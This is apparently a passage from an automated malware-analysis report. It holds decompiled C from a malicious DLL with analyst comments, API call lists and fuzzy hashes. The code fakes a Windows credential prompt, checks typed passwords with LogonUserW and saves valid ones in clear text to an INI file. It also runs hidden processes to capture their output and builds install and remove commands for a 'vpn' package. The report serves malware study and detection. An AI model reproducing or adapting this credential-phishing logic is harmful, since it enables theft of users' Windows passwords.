    							goto L35;
    						} else {
    							// Second call with the allocated buffer: the packed "in" credential (domain\user, no password)
    							// pre-fills the user name field of the prompt.
    							_t155 = HeapAlloc(GetProcessHeap(), 8, _v1432);
    							_v1420 = _t155;
    							if(_t155 == 0) {
    								goto L34;
    							}
    							_push( &_v1432);
    							_push(_t155);
    							_push(0x6ecad664);
    							_push( &_v1048);
    							_push(0);
    							if(_v1316() == 0) {
    								L33:
    								HeapFree(GetProcessHeap(), _t200, _t155);
    								goto L34;
    							}
    							// Prompt loop. Nine arguments with dwFlags = 0x20 (CREDUIWIN_IN_CRED_ONLY) match
    							// CredUIPromptForWindowsCredentialsW(pUiInfo, dwAuthError = _t191, &authPackage, inBuf, inSize,
    							// &outBuf, &outSize, &save, dwFlags). A non-zero return (for example Cancel) breaks out, but see
    							// the code after the loop: it sleeps and re-enters at L25.
    							while(1) {
    								L25:
    								_push(0x20);
    								_push( &_v1436);
    								_push( &_v1448);
    								_push( &_v1456);
    								_push(_v1452);
    								_push(_t155);
    								_push( &_v1424);
    								_push(_t191);
    								_push( &_v1416);
    								_v1432 = 1;
    								_v1424 = _t200;
    								_v1456 = _t200;
    								_v1448 = _t200;
    								_v1436 = _t200;
    								if(_v1384() != 0) {
    									break;
    								}
    								// Zero the user buffer (0x404 bytes = 0x202 wide chars) and the password buffer at _t185[0x202]
    								// (0x202 bytes = 0x101 wide chars), then unpack the returned blob. Nine arguments with
    								// flags = 1 (CRED_PACK_PROTECTED_CREDENTIALS) match CredUnPackAuthenticationBufferW(flags, buf,
    								// size, user, &userLen, domain = NULL, &domainLen = NULL, password, &passwordLen).
    								_push(0x404);
    								_push(_t185);
    								_v1480 = 0x202;
    								L6ECAC2EE();
    								_push(0x202);
    								_t74 =  &(_t185[0x202]); // 0x404
    								_t156 = _t74;
    								_push(_t156);
    								_v1472 = 0x101;
    								L6ECAC2EE();
    								_push( &_v1480);
    								_push(_t156);
    								_push(_t200);
    								_push(_t200);
    								_push( &_v1496);
    								_push(_t185);
    								_push(_v1500);
    								_push(_v1508);
    								_push(1);
    								if(_v1420() != 0) {
    									// Split "domain\user": user buffer at _t185[0x303] (0x202 chars), domain buffer at _t185[0x505]
    									// (0x2a4 bytes = 0x152 chars = CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1). The (name, user, 0x202,
    									// domain, 0x152) call matches CredUIParseUserNameW; the decompiler dropped the domain-buffer push.
    									_push(0x404);
    									_t81 =  &(_t185[0x303]); // 0x606
    									_t202 = _t81;
    									_push(_t202);
    									L6ECAC2EE();
    									_push(0x2a4);
    									_t82 =  &(_t185[0x505]); // 0xa0a
    									L6ECAC2EE();
    									_push(0x152);
    									_t83 =  &(_t185[0x505]); // 0xa0a
    									_push(0x202);
    									_push(_t202);
    									_push(_t185);
    									// Validate the typed password with LogonUserW (E6ECA5130). Success: persist it in clear text via
    									// WritePrivateProfileStringW(L"PWD", user, password, <INI path in M6ECB04D0>). Failure: set
    									// _t191 = 0x52e (ERROR_LOGON_FAILURE, 1326) so the next prompt shows the real "wrong password"
    									// error, and loop. As far as the decompilation shows, the loop ends (L33) only after a password
    									// that actually logs on.
    									if(_v1456() == 0) {
    										_t85 =  &(_t185[0x505]); // 0xa0a
    										_t133 = E6ECA5130(_t202, _t85, _t156);
    										_t206 = _t206 + 0xc;
    										if(_t133 == 0) {
    											_v1556 = 0;
    											_t191 = 0x52e;
    										} else {
    											_t180 = M6ECB04D0; // 0xcc4128
    											WritePrivateProfileStringW(L"PWD", _t185, _t156, _t180);
    										}
    									}
    									_t200 = 0;
    								}
    								__imp__CoTaskMemFree(_v1544);
    								_t155 = _v1532;
    								if(_v1524 == _t200) {
    									continue;
    								} else {
    									goto L33;
    								}
    							}
    						// Reached when the prompt call returned non-zero (for example the user pressed Cancel): derive a new
    						// dwAuthError, wait 500 ms (0x1f4) and show the dialog again.
    						asm("sbb esi, esi");
    						_t191 = ( ~_v72 & 0xfffff693) + 0xfdb;
    						Sleep(0x1f4);
    						goto L25;
    						}
    					} else {
    					// wuaueng.dll variant: string IDs 0x69 and 0x184 plus a module message (0xb0000028, FormatMessageW
    					// with FORMAT_MESSAGE_FROM_HMODULE) and a system message (0x1109) form the message text.
    					// rstrui.exe variant (below): string IDs 0xab, 0x91 and 0xd2.
    					_push(0x80);
    					_push(_t190);
    					if(_v4 != 0) {
    						if(LoadStringW(_t154, 0x69, ??, ??) > 0) {
    								_v1372 = _t190;
    							}
    							_t195 = FormatMessageW(0xaff, _t154, 0xb0000028, 0, _t199, 0x926, 0);
    							_t196 = _t195 + LoadStringW(_t154, 0x184,  &(_t199[_t195]), 0x926 - _t195);
    							_t140 = wsprintfW( &(_t199[_t196]), L"\r\n\r\n");
    							_t205 = _t205 + 8;
    							FormatMessageW(0x12ff, 0, 0x1109, 0,  &(_t199[_t196 + _t140]), 0x926 - _t196 + _t140, 0);
    							L18:
    							_v1368 = _t199;
    							L19:
    							FreeLibrary(_t154);
    							goto L20;
    						}
    						_t145 = LoadStringW(_t154, 0xab, ??, ??);
    						if(_t145 > 0) {
    							_t34 = _t145 * 2; // 0xcb2
    							_t190[_t145] = 0x20002e;
    							if(LoadStringW(_t154, 0x91, _t190 + _t34 + 4, 0x80 - _t145) > 0) {
    								_v1372 = _t190;
    							}
    						}
    						if(LoadStringW(_t154, 0xd2, _t199, 0x926) <= 0) {
    							goto L19;
    						} else {
    							goto L18;
    						}
    					}
    				}
    			}

    (Instruction-address column from the original page, collapsed: 0x6eca96d0 .. 0x6eca9bbe, one address per line of E6ECA96D0 above.)

    APIs
      • Part of subcall function 6ECA5130: LogonUserW.ADVAPI32(00CD21B8,00CD21B8,6ECA96ED,00000002,00000000,00CD3FB0), ref: 6ECA5150
      • Part of subcall function 6ECA5130: GetLastError.KERNEL32 ref: 6ECA515C
      • Part of subcall function 6ECA5130: CloseHandle.KERNEL32(?), ref: 6ECA5177
    • SwitchDesktop.USER32(00000000,00000000,00000000), ref: 6ECA970C
    • SetThreadDesktop.USER32(00000000), ref: 6ECA9718
    • LoadLibraryA.KERNEL32(credui.dll,00000000,00000000), ref: 6ECA9723
    • GetProcessHeap.KERNEL32(00000008,00002000,00000000,00000000,?,00000004,FF000000), ref: 6ECA97BB
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA97C2
    • RtlZeroMemory.NTDLL(?,00000014), ref: 6ECA97DA
    • GetSystemDirectoryA.KERNEL32 ref: 6ECA9814
    • PathAddBackslashA.SHLWAPI(?), ref: 6ECA9822
    • lstrcatA.KERNEL32(?,rstrui.exe), ref: 6ECA9844
    • LoadLibraryExA.KERNEL32(?,00000000,00000020), ref: 6ECA9855
    • LoadStringW.USER32(00000000,000000AB,00000CAE,00000080), ref: 6ECA987B
    • LoadStringW.USER32(00000000,00000091,00000CB2,00000080), ref: 6ECA989F
    • LoadStringW.USER32(00000000,000000D2,00000DB0,00000926), ref: 6ECA98B9
    • FreeLibrary.KERNEL32(00000000,?,00000926,00000000,?,?,00000104,?,00000014,76D24F20), ref: 6ECA9952
    • wsprintfW.USER32 ref: 6ECA998A
    • GetLastError.KERNEL32(?,?,?,?,00000104,?,00000014,76D24F20), ref: 6ECA99B6
    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,00000104,?,00000014,76D24F20), ref: 6ECA99CC
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000104,?,00000014,76D24F20), ref: 6ECA99D3
    • RtlZeroMemory.NTDLL(00000000,00000404), ref: 6ECA9A64
    • RtlZeroMemory.NTDLL(00000404,00000202), ref: 6ECA9A7D
    • RtlZeroMemory.NTDLL(00000606,00000404), ref: 6ECA9AB3
    • RtlZeroMemory.NTDLL(00000A0A,000002A4), ref: 6ECA9AC4
    • WritePrivateProfileStringW.KERNEL32(PWD,00000000,00000404,00CC4128), ref: 6ECA9B0A
    • CoTaskMemFree.OLE32(?), ref: 6ECA9B26
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00000104,?,00000014,76D24F20), ref: 6ECA9B3C
    • HeapFree.KERNEL32(00000000,?,?,?,?,00000104,?,00000014,76D24F20), ref: 6ECA9B43
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00000104,?,00000014,76D24F20), ref: 6ECA9B4B
    • HeapFree.KERNEL32(00000000,?,?,?,?,00000104,?,00000014,76D24F20), ref: 6ECA9B52
    • FreeLibrary.KERNEL32(00000000,00000000,?,00000004,FF000000), ref: 6ECA9B61
    • Sleep.KERNEL32(000007D0), ref: 6ECA9B77
    • SwitchDesktop.USER32(00000000), ref: 6ECA9B84
    • SetThreadDesktop.USER32(00000000), ref: 6ECA9B91
    • Sleep.KERNEL32(000001F4), ref: 6ECA9BBE
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$FreeLoadMemoryZero$DesktopLibraryProcessString$AllocErrorLastSleepSwitchThread$BackslashCloseDirectoryHandleLogonPathPrivateProfileSystemTaskUserWritelstrcatwsprintf
    • String ID: $%s\%s$PWD$credui.dll$rstrui.exe$wuaueng.dll
    • API String ID: 938628543-1540689510
    • Opcode ID: caaf6a8ae9a13ef5b41b3b163e6fa4b649a18cb5852eb2c3e9757e606e77ac40
    • Instruction ID: 6887ada069cba990275e3ccb6a1ae90e320e59e16bf469457a859cb26b385207
    • Opcode Fuzzy Hash: caaf6a8ae9a13ef5b41b3b163e6fa4b649a18cb5852eb2c3e9757e606e77ac40
    • Instruction Fuzzy Hash: FED16DB1604705AFE7208FA9DD89F9BBBB8FB89704F00491DFA5997241E7719804CF62
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E6ECA2ED0(intOrPtr* _a12) {
    				intOrPtr* _v4;
    				signed int _v8;
    				CHAR* _v12;
    				intOrPtr _v16;
    				struct _STARTUPINFOA _v84;
    				struct _PROCESS_INFORMATION _v100;
    				void* _v108;
    				void* _v112;
    				CHAR* _v116;
    				void* _v120;
    				void* _v124;
    				void* _v128;
    				intOrPtr _v132;
    				long _v136;
    				CHAR* _t52;
    				int _t54;
    				long _t69;
    				intOrPtr _t82;
    				long _t85;
    				void* _t90;
    				struct _OVERLAPPED* _t110;
    				void* _t111;
    				int _t112;
    				int _t116;
    				void* _t121;
    
    				_t110 = 0;
    				_v116 = 0;
    				_t90 = 0;
    				_v100.hThread.nLength = 0xc;
    				_v100.dwProcessId = 0;
    				_v100.dwThreadId = 1;
    				_v112 = 0;
    				_v108 = 0;
    				if(CreatePipe( &_v112,  &_v108,  &(_v100.hThread), 0) == 0) {
    					 *_a12 = 0;
    					return 0;
    				} else {
    					_push(0x44);
    					_push( &(_v84.dwX));
    					L6ECAC2EE();
    					_t52 = _v116;
    					_push(0x10);
    					_push( &(_v100.dwProcessId));
    					_v84.lpDesktop = 0x44;
    					_v84.lpReserved2 = 0x101;
    					_v12 = _t52;
    					_v16 = _t52;
    					L6ECAC2EE();
    					_t54 = CreateProcessA(0, _v12, 0, 0, 1, 0x8000000, 0, 0,  &_v84,  &_v100);
    					CloseHandle(_v124);
    					if(_t54 != 0) {
    						_t111 = HeapAlloc(GetProcessHeap(), 8, 0x401);
    						_v120 = _t111;
    						if(_t111 != 0) {
    							_v116 = GetTickCount() + _v8 * 0x3e8;
    							_v136 = 0;
    							if(ReadFile(_v128, _t111, 0x400,  &_v136, 0) != 0) {
    								while(1) {
    									_t69 = _v136;
    									if(_t69 == 0) {
    										goto L23;
    									}
    									 *((char*)(_t69 + _t111)) = 0;
    									_t116 = MultiByteToWideChar(1, 0, _t111, _v136, 0, 0);
    									if(_t116 != 0) {
    										_t31 = _t116 + 2; // 0x2
    										_t121 = HeapAlloc(GetProcessHeap(), 8, _t116 + _t31);
    										if(_t121 != 0) {
    											if(MultiByteToWideChar(1, 0, _t111, _v136, _t121, _t116) != 0) {
    												_t112 = WideCharToMultiByte(0xfde9, 0, _t121, _t116, 0, 0, 0, 0);
    												if(_t112 != 0) {
    													_t82 = _v132 + _t112;
    													_v132 = _t82;
    													_push(_t82 + 1);
    													if(_t90 != 0) {
    														_t85 = HeapReAlloc(GetProcessHeap(), 0, _t90, ??);
    														if(_t85 != 0) {
    															goto L12;
    														} else {
    															HeapFree(GetProcessHeap(), _t85, _t90);
    															_t90 = 0;
    															goto L14;
    														}
    														goto L24;
    													} else {
    														_t85 = HeapAlloc(GetProcessHeap(), 8, ??);
    														L12:
    														_t90 = _t85;
    														if(_t90 != 0) {
    															WideCharToMultiByte(0xfde9, 0, _t121, _t116, _t90 - _t112 + _v132, _t112, 0, 0);
    														}
    													}
    												}
    												L14:
    												_t111 = _v120;
    											}
    											HeapFree(GetProcessHeap(), 0, _t121);
    										}
    									}
    									if(GetTickCount() >= _v116 || _t90 == 0) {
    										_push(0);
    										_push(_v100.hProcess);
    										L6ECAC30C();
    									} else {
    										if(ReadFile(_v128, _t111, 0x400,  &_v136, 0) != 0) {
    											continue;
    										} else {
    										}
    									}
    									goto L23;
    								}
    							}
    							L23:
    							HeapFree(GetProcessHeap(), 0, _t111);
    						}
    						L24:
    						CloseHandle(_v100.hThread);
    						CloseHandle(_v100);
    						_t110 = _v132;
    					}
    					CloseHandle(_v128);
    					 *_v4 = _t110;
    					return _t90;
    				}
    			}

    0x6eca2ed5
    0x6eca2ee7
    0x6eca2eeb
    0x6eca2eed
    0x6eca2ef5
    0x6eca2ef9
    0x6eca2f01
    0x6eca2f05
    0x6eca2f11
    0x6eca3173
    0x6eca317c
    0x6eca2f17
    0x6eca2f19
    0x6eca2f1f
    0x6eca2f20
    0x6eca2f25
    0x6eca2f29
    0x6eca2f2f
    0x6eca2f30
    0x6eca2f38
    0x6eca2f40
    0x6eca2f47
    0x6eca2f4e
    0x6eca2f71
    0x6eca2f84
    0x6eca2f88
    0x6eca2fa2
    0x6eca2fa4
    0x6eca2faa
    0x6eca2fd0
    0x6eca2fda
    0x6eca2fe6
    0x6eca2ff0
    0x6eca2ff0
    0x6eca2ff6
    0x00000000
    0x00000000
    0x6eca3000
    0x6eca3014
    0x6eca3018
    0x6eca301e
    0x6eca3032
    0x6eca3036
    0x6eca3050
    0x6eca3069
    0x6eca306d
    0x6eca3073
    0x6eca3075
    0x6eca307a
    0x6eca307d
    0x6eca3101
    0x6eca3109
    0x00000000
    0x6eca310b
    0x6eca3114
    0x6eca311a
    0x00000000
    0x6eca311a
    0x00000000
    0x6eca307f
    0x6eca3088
    0x6eca308e
    0x6eca308e
    0x6eca3092
    0x6eca30ab
    0x6eca30ab
    0x6eca3092
    0x6eca307d
    0x6eca30b1
    0x6eca30b1
    0x6eca30b1
    0x6eca30bf
    0x6eca30bf
    0x6eca3036
    0x6eca30cf
    0x6eca3122
    0x6eca3124
    0x6eca3125
    0x6eca30d5
    0x6eca30ef
    0x00000000
    0x00000000
    0x6eca30f5
    0x6eca30ef
    0x00000000
    0x6eca30cf
    0x6eca2ff0
    0x6eca312a
    0x6eca3134
    0x6eca313a
    0x6eca3140
    0x6eca3145
    0x6eca314c
    0x6eca314e
    0x6eca314e
    0x6eca3157
    0x6eca3162
    0x6eca316b
    0x6eca316b

    APIs
    • CreatePipe.KERNEL32 ref: 6ECA2F09
    • RtlZeroMemory.NTDLL(?,00000044), ref: 6ECA2F20
    • RtlZeroMemory.NTDLL ref: 6ECA2F4E
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,08000000,00000000,00000000,?,?), ref: 6ECA2F71
    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA2F84
    • GetProcessHeap.KERNEL32(00000008,00000401,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA2F95
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA2F9C
    • GetTickCount.KERNEL32 ref: 6ECA2FB0
    • ReadFile.KERNEL32(?,00000000,00000400,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6ECA2FDE
    • MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,?,00000000,00000000), ref: 6ECA300E
    • GetProcessHeap.KERNEL32(00000008,00000002,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA3025
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA302C
    • MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,?,00000000,00000000), ref: 6ECA3048
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6ECA3063
    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA3081
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA3088
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 6ECA30AB
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA30B8
    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA30BF
    • GetTickCount.KERNEL32 ref: 6ECA30C5
    • ReadFile.KERNEL32(?,00000000,00000400,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6ECA30E7
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?), ref: 6ECA30FA
    • HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA3101
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA310D
    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA3114
    • NtTerminateProcess.NTDLL(?,00000000), ref: 6ECA3125
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA312D
    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA3134
    • CloseHandle.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA3145
    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA314C
    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA3157
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Process$AllocByteCharCloseHandleMultiWide$Free$CountCreateFileMemoryReadTickZero$PipeTerminate
    • String ID: D
    • API String ID: 1574224466-2746444292
    • Opcode ID: cea1489233ed15195fbfdb460d02549a7374dbfb8aacd9906001b45b04a914e8
    • Instruction ID: 13df8fc86cdbb0a928cff83d9d2cea09afc0cf63ff638e3e6ebadfcad4970448
    • Opcode Fuzzy Hash: cea1489233ed15195fbfdb460d02549a7374dbfb8aacd9906001b45b04a914e8
    • Instruction Fuzzy Hash: 9B715BB1244702ABE7109FA9CD59F5FBBF9EBC9B05F01491CBB4597280EA70D804CB22
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E6ECA44D0(void* __ebx, void* __edi) {
    				CHAR* _t35;
    				int _t36;
    				void* _t42;
    				int _t46;
    				CHAR* _t47;
    				void* _t50;
    				void* _t55;
    				CHAR* _t57;
    				void* _t64;
    				void* _t65;
    				void* _t66;
    				CHAR* _t67;
    				CHAR* _t69;
    				signed int _t70;
    				signed int _t74;
    				CHAR* _t78;
    				void* _t79;
    				CHAR* _t82;
    				void* _t84;
    				CHAR* _t86;
    				void* _t87;
    				void* _t88;
    				void* _t89;
    				intOrPtr _t92;
    				intOrPtr _t93;
    				CHAR* _t94;
    				void* _t96;
    				void* _t98;
    				void* _t99;
    				void* _t100;
    
    				_t89 = __edi;
    				_t66 = __ebx;
    				 *(_t98 + 0xc) = 0;
    				if(M6ECB0544 == 0) {
    					L23:
    					return  *(_t98 + 0xc);
    				} else {
    					_t35 = M6ECB04CC; // 0xcb2da8
    					_t69 = M6ECB04D8; // 0x0
    					_t82 = M6ECB04DC; // 0x0
    					_t36 = GetPrivateProfileIntA(_t82, _t69, 0, _t35);
    					_t93 =  *((intOrPtr*)(_t98 + 0x38));
    					if(_t93 != 0 || _t36 != 0) {
    						if( *((intOrPtr*)(_t98 + 0x3c)) != 0) {
    							goto L7;
    						} else {
    							_t64 = M6ECB04D8; // 0x0
    							_t65 = E6ECA38A0(_t64, 0, 0, 1);
    							_t98 = _t98 + 0x10;
    							if(_t65 == (0 | _t93 == 0x00000000)) {
    								goto L7;
    							}
    						}
    						goto L23;
    					} else {
    						if( *((intOrPtr*)(_t98 + 0x3c)) != _t36) {
    							L7:
    							_t96 = HeapAlloc(GetProcessHeap(), 8, 0x800);
    							if(_t96 != 0) {
    								_push(_t66);
    								_push(_t89);
    								wsprintfA(_t96, "%s%s%s", "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", "vpn", ".cab");
    								_t7 = _t96 + 0x201; // 0x201
    								_t67 = _t7;
    								 *((intOrPtr*)(_t98 + 0x50)) = wsprintfA(_t67, "%s%s%c", "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", "vpn", 0x5c);
    								_t42 = E6ECA2DC0(_t96, _t67, 0);
    								_t98 = _t98 + 0x34;
    								if(_t42 != 0) {
    									_t70 = M6ECB04EC; // 0x0
    									asm("sbb ecx, ecx");
    									wsprintfA(_t96, "%s%d%c", _t67, ( ~_t70 & 0xffffffea) + 0x56, 0x5c);
    									_t9 =  &(_t67[0x401]); // 0x602
    									_t94 = _t9;
    									_t46 = wsprintfA(_t94, "%s%s%s", _t96, "install", ".exe");
    									_t99 = _t98 + 0x28;
    									_t47 =  &(( &(_t94[1]))[_t46]);
    									 *(_t99 + 0x10) = _t47;
    									if( *((intOrPtr*)(_t99 + 0x44)) == 0) {
    										_t84 = M6ECB04D8; // 0x0
    										wsprintfA(_t47, "%s %s", "remove", _t84);
    										_t100 = _t99 + 0x10;
    									} else {
    										_t79 = M6ECB04D8; // 0x0
    										wsprintfA(_t47, "%s \"%s%s%s\" %s", "install", _t96, _t79, ".inf", _t79);
    										_t100 = _t99 + 0x1c;
    									}
    									_t74 =  *(_t100 + 0x10);
    									_push(_t100 + 0x14);
    									_push(0x1e);
    									_push(0);
    									 *(_t100 + 0x2c) = 0;
    									_t50 = E6ECA4230(0, _t94, _t74);
    									_t98 = _t100 + 0x18;
    									if(_t50 != 0) {
    										if(E6ECA4300() != 0) {
    											_t88 = M6ECB04D8; // 0x0
    											wsprintfA( *(_t98 + 0x10), "%s %s", "restart", _t88);
    											_t74 =  *(_t98 + 0x20);
    											_push(0);
    											_push(0x1e);
    											_push(0);
    											E6ECA4230(0, _t94, _t74);
    											_t98 = _t98 + 0x28;
    										}
    										_t92 =  *((intOrPtr*)(_t98 + 0x44));
    										if(_t92 == 0) {
    											_t55 = M6ECB04D8; // 0x0
    											E6ECA3700(_t55, 1);
    											_t98 = _t98 + 8;
    										} else {
    											_t87 = M6ECB04D8; // 0x0
    											E6ECA38A0(_t87, 0, 0, 0);
    											_t98 = _t98 + 0x10;
    										}
    										if( *((intOrPtr*)(_t98 + 0x14)) == 0) {
    											 *_t94 = (_t74 & 0xffffff00 | _t92 != 0x00000000) + 0x30;
    											_t94[1] = 0;
    											_t86 = M6ECB04CC; // 0xcb2da8
    											_t57 = M6ECB04D8; // 0x0
    											_t78 = M6ECB04DC; // 0x0
    											WritePrivateProfileStringA(_t78, _t57, _t94, _t86);
    											 *((intOrPtr*)(_t98 + 0x18)) = 1;
    										}
    									}
    									_push(0x1e);
    									_push(_t98 + 0x24);
    									 *((short*)( *((intOrPtr*)(_t98 + 0x1c)) + _t67 - 1)) = 0;
    									L6ECAC2EE();
    									 *((intOrPtr*)(_t98 + 0x28)) = 3;
    									 *(_t98 + 0x2c) = _t67;
    									 *((short*)(_t98 + 0x34)) = 0x614;
    									SHFileOperationA(_t98 + 0x20);
    								}
    								HeapFree(GetProcessHeap(), 0, _t96);
    							}
    							goto L23;
    						} else {
    							return _t36;
    						}
    					}
    				}
    			}

    0x6eca44d0
    0x6eca44d0
    0x6eca44db
    0x6eca44e3
    0x6eca4749
    0x6eca4751
    0x6eca44e9
    0x6eca44e9
    0x6eca44ee
    0x6eca44f4
    0x6eca44ff
    0x6eca4505
    0x6eca450b
    0x6eca4521
    0x00000000
    0x6eca4523
    0x6eca4523
    0x6eca452f
    0x6eca4536
    0x6eca4540
    0x00000000
    0x00000000
    0x6eca4540
    0x00000000
    0x6eca4511
    0x6eca4515
    0x6eca4546
    0x6eca455b
    0x6eca455f
    0x6eca456b
    0x6eca456c
    0x6eca4584
    0x6eca4593
    0x6eca4593
    0x6eca45a5
    0x6eca45a9
    0x6eca45ae
    0x6eca45b3
    0x6eca45b9
    0x6eca45c1
    0x6eca45d3
    0x6eca45e0
    0x6eca45e0
    0x6eca45ec
    0x6eca45ee
    0x6eca45f6
    0x6eca45fa
    0x6eca45fe
    0x6eca4620
    0x6eca4632
    0x6eca4634
    0x6eca4600
    0x6eca4600
    0x6eca4619
    0x6eca461b
    0x6eca461b
    0x6eca4637
    0x6eca463f
    0x6eca4640
    0x6eca4642
    0x6eca4648
    0x6eca4650
    0x6eca4655
    0x6eca465a
    0x6eca4667
    0x6eca4669
    0x6eca467f
    0x6eca4681
    0x6eca4685
    0x6eca4687
    0x6eca4689
    0x6eca468f
    0x6eca4694
    0x6eca4694
    0x6eca4697
    0x6eca469d
    0x6eca46b6
    0x6eca46be
    0x6eca46c3
    0x6eca469f
    0x6eca469f
    0x6eca46ac
    0x6eca46b1
    0x6eca46b1
    0x6eca46cb
    0x6eca46d5
    0x6eca46d7
    0x6eca46db
    0x6eca46e1
    0x6eca46e6
    0x6eca46f0
    0x6eca46f6
    0x6eca46f6
    0x6eca46cb
    0x6eca4702
    0x6eca4708
    0x6eca4709
    0x6eca4710
    0x6eca471f
    0x6eca4727
    0x6eca472b
    0x6eca4730
    0x6eca4730
    0x6eca4740
    0x6eca4747
    0x00000000
    0x6eca451b
    0x6eca451b
    0x6eca451b
    0x6eca4515
    0x6eca450b

    APIs
    • GetPrivateProfileIntA.KERNEL32 ref: 6ECA44FF
